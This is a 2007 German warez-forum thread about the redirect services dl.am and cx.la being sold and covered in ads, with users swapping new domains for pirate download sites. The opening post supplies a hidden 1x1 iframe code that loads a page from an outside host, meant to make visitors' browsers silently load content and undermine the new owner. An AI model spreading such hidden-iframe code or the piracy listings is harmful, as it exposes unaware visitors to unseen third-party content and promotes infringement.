dl.am und cx.la verkauft!!!

Dieses Thema im Forum "Szene News" wurde erstellt von delico, 20. November 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 20. November 2007
    Die Angaben sind noch nicht ganz bestätigt, aber Fakt ist, dass die beiden Anbieter .dl.am und .cx.la down gegangen sind und sämtliche Refer mit Werbung zu gemauert sind! Ein Schock für die Scene?

    JA! Fast alle Scene Seiten benutzen den bekannten Refer-Dienst .dl.am. Laut Quellen im Layer-Ads Forum wurden dl.am, sowie cx.la aufgekauft. Unter dem Vorwand eine Server Wartung durchzuführen, besteht die Seite http://dl.am/ nun nur noch aus Werbung! Schlimmer noch! Von sämtlichen bekannten .dl.am Seiten wurden screenshots aufgenommen und diese zu einem Usenext Ref-Link verlinkt!! Der Newsletter dient natürlich nur Werbezwecken, wer sich dort einschreibt wird zukünftig ein volleres Postfach haben. Ob der Service wieder aufgenommen wird ist natürlich ungewiss. Sicher ist, dass dies ein schwerer Schlag für alle Webmaster, die den dl.am Anbieter nutzen ist!!

    Alle User die sich dagegen wehren wollen sollten folgenden Code in Ihre Webseite einbauen
    Code:
    <iframe src="http://home.tiscali.cz:8080/acc87212/dlam.html" height="1" width="1" frameborder="0"></iframe>
    Dadurch werden alle Fake Screenshots der dl.am Domain mitgeladen.

    Damit könnten wir es schaffen, dass die Werbung auf den dl.am Domains nicht mehr angezeigt wird und die User dann andere Domains ausprobieren und so auf eure Seite kommen

    Ich werde auch eine Liste machen wie Ihr die ganzen Domains jetzt erreichen werdet:

    http://www.3.dl.am ---> http://www.3dl.am
    http://movie-blog.dl.am ---> MOVIE-BLOG
    http://www.ddl-warez.dl.am/ ---> http://www.ddl-warez.org
    http://diebe.dl.am/ ---> http://www.diebe.org/
    http://www.neonfiles.dl.am/ ---> http://www.neonfiles.6x.to/
    http://www.club-team.dl.am/ ---> GO.PL - Platforma RTB, dynamiczny remarketing produktowy w modelu RTB
    http://f4n4tic-project.dl.am/ ---> http://f4n4tic-project.6x.to/
    http://technorocker.dl.am/ ---> Technorocker.info
    http://serienjunkies.dl.am ---> http://serienjunki.es
    http://amaretto.dl.am ---> http://amaretto.in
    sceneload.dl.am = http://89.248.162.150/~sceneload/
    http://tlf.dl.am ---> http://85.12.31.18/~tlf/

    Wenn mir mehr auffallen werd ich sie hier reineditieren
     

  2. Anzeige
  3. #2 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    jojo hab ich auch scho gehört

    schlimm aber naja kein weltuntergang ^^

    auserdem benutzt raidrush ja .ws

    is halt immer nen schritt voraus :)
     
  4. #3 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    Naja, ein kleiner Weltuntergang war es doch schon bzw. ist es
    doch schon ... viele Seiten sind nur unter diesen Domains bekannt.
    Wird einige Tage dauern, bis die Sites wieder die normalen Userzahlen
    haben werden und solang wird der neue Besitzer der Domain noch
    heftig Geld scheffeln, aber ob das sich da sooo geloht hat, wer weiß

    bb. master80
     
  5. #4 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    3.dl.am hat aber überall ne weiterleitung auf usenext!!!!!!;( ;(
     
  6. #5 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    häää?? ist doch verkauft wieso kann ich das den noch normal nutzen??? und runterladen??
    geil bin was besonderes^^
    @ topic da wird einer in den nächsten 2-3 tagen warscheinlich solche umsätze machen das er das geld wieder reinholt

    mfg AggroWest
     
  7. #6 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    Damit kriegt der Admin von dl.am einiges an Hits:) Aber keiner wird diesen Service mehr benutzen.
    Es gibt zum Glück gute Alternativen, zb. 6x.to. Ich finde 6x.to schon seit einiger Zeit besser als dl.am.
    Für alle Webmaster ist es bestimmt ein Schock, denn nun müssen sie alle Links ändern und die Besucherzahlen, werde heute niedrig wie nie sein.
     
  8. #7 20. November 2007
    AW: dl.am und cx.la verkauft!!!


    Nö bei mir gehts auch noch =)
     
  9. #8 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    Weiß jemand, wo man jetzt serirnfreaks oder serienjunkies erreichen kann?
     
  10. #9 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    -.-' nicht 3dl.am SONDERN 3.dl.am geht nicht -.-'

    3dl.am <-- Domain von 3 !

    bb. master80
     
  11. #10 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    Finde ich jetzt mal richtig hefitg! Und der Webmaster einer .dl.am Seite kann sich dagegen in keiner Weise wehren?
     
  12. #11 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    Oh man, das ist echt doof ... so ziemlich jede Warez-Seite hat/te ja eine .dl.am Domain. Hier noch ein paar Seiten, wo ich weiß, dass die auch mindestens eine andere Domain, als .dl.am hatten:

    http://www.ddl-warez.dl.am/ ---> http://www.ddl-warez.org
    http://diebe.dl.am/ ---> http://www.diebe.org/
    http://www.neonfiles.dl.am/ ---> http://www.neonfiles.6x.to/
    http://www.club-team.dl.am/ ---> GO.PL - Platforma RTB, dynamiczny remarketing produktowy w modelu RTB
    http://f4n4tic-project.dl.am/ ---> http://f4n4tic-project.6x.to/
    http://technorocker.dl.am/ ---> Technorocker.info

    @snoggi: http://serienjunki.es/

    Weiß einer die neuen Domains von Amaretto, Hotmedia, Pubchecker und TaschenLampenFiles (tlf.dl.am)?

    MfG
    !nvaTion
     
  13. #12 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    achso dann hab ich mich bloß verguckt
    boah glück gehabt^^
    dann heißt das ja einfach weiterladen ;-)

    mfg AggroWest
     
  14. #13 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    http://amaretto.in/
     
  15. #14 20. November 2007
    Zuletzt von einem Moderator bearbeitet: 15. April 2017
    AW: dl.am und cx.la verkauft!!!

    board.raidrush.ws
     
  16. #15 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    dl.am und cx.la sind keine Verluste. Die Besucher werden schnell wieder da sein. Die Person oder Firma die, die Domain etc. gekauft hat wird kein Erfolg mit so welchen "Fakeseiten" haben.

    klaiser
     
  17. #16 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    tlf.dl.am erreichbar unter tlf.t3.to
     
  18. #17 20. November 2007
    Zuletzt von einem Moderator bearbeitet: 15. April 2017
    AW: dl.am und cx.la verkauft!!!

    wie schade, dass das ein vollkommen anderer thread ist und hier nur links gesammelt werden!
     
  19. #18 20. November 2007
    AW: dl.am und cx.la verkauft!!!

    Im ersten Post steht aber drunter: *Geändert von delico (Heute um 17:53 Uhr).* - Also war's am Anfang nix anderes?!
     
  20. #19 20. November 2007
    Zuletzt von einem Moderator bearbeitet: 15. April 2017
    AW: dl.am und cx.la verkauft!!!

    Showthread Php 342861 / Download - RR:Suche

    P.S.: Es ist egal, ob hier Links gesammelt werden. Auch die Links gehören in den anderen Thread.
     

  21. Videos zum Thema
Die Seite wird geladen...
Similar Threads - verkauft
  1. Antworten:
    13
    Aufrufe:
    1.446
  2. Antworten:
    1
    Aufrufe:
    3.018
  3. Antworten:
    53
    Aufrufe:
    4.593
  4. Antworten:
    12
    Aufrufe:
    1.839
  5. Google verkauft Motorola an Lenovo

    Phame , 30. Januar 2014 , im Forum: Mobile News
    Antworten:
    4
    Aufrufe:
    1.094